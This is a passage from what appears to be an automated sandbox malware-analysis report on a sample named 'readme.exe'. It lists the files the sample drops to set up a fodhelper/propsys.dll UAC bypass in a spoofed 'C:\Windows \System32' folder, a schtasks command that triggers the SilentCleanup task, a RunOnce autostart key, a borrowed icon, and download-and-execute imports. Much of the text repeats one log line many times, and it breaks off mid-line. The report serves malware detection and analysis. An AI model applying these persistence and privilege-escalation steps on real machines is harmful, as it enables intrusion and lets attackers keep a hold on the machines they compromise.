??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,20_2_0040D427
Drops PE filesShow sources
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows \System32\fodhelper.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows \System32\propsys.dllJump to dropped file
Source: C:\Users\user\Desktop\readme.exeFile created: C:\Users\Public\propsys.dllJump to dropped file
Source: C:\Users\user\Desktop\readme.exeFile created: C:\Users\user\AppData\Local\Htdr\Htdrset.exeJump to dropped file
Source: C:\Users\user\Desktop\readme.exeFile created: C:\Users\Public\fodhelper.exeJump to dropped file
Drops PE files to the user directoryShow sources
Source: C:\Users\user\Desktop\readme.exeFile created: C:\Users\Public\propsys.dllJump to dropped file
Source: C:\Users\user\Desktop\readme.exeFile created: C:\Users\Public\fodhelper.exeJump to dropped file
Drops PE files to the windows directory (C:\Windows)Show sources
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows \System32\fodhelper.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows \System32\propsys.dllJump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directoryShow sources
Source: C:\Users\user\Desktop\readme.exeFile created: C:\Users\Public\propsys.dllJump to dropped file
Source: C:\Users\user\Desktop\readme.exeFile created: C:\Users\Public\fodhelper.exeJump to dropped file
Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Contains functionality to start windows servicesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_004111A9 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,20_2_004111A9
Creates an autostart registry keyShow sources
Source: C:\Users\user\Desktop\readme.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce HtdrJump to behavior
Source: C:\Users\user\Desktop\readme.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce HtdrJump to behavior
Source: C:\Users\user\Desktop\readme.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce HtdrJump to behavior
Source: C:\Users\user\Desktop\readme.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce HtdrJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Icon mismatch, binary includes an icon from a different legit application in order to fool usersShow sources
Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (37).png
Contains functionality to check if a window is minimized (may be used to check if an application is visible)Show sources
Source: C:\Users\user\Desktop\readme.exeCode function: 0_2_004619BC PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,0_2_004619BC
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 21_2_004619BC PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,21_2_004619BC
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 21_2_004620EC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA,21_2_004620EC
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 21_2_004621B0 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus,21_2_004621B0
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 21_2_0045E4F8 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow,21_2_0045E4F8
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 29_2_004619BC PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,29_2_004619BC
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 29_2_004620EC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA,29_2_004620EC
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 29_2_004621B0 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus,29_2_004621B0
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 29_2_0045E4F8 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow,29_2_0045E4F8
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 29_2_0044C640 IsIconic,GetCapture,29_2_0044C640
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 29_2_0044CF48 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,29_2_0044CF48
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 29_2_0044D918 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,29_2_0044D918
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 29_2_0041DFE0 IsIconic,GetWindowPlacement,GetWindowRect,29_2_0041DFE0
Extensive use of GetProcAddress (often used to hide API calls)Show sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_004099CD LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,20_2_004099CD
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEE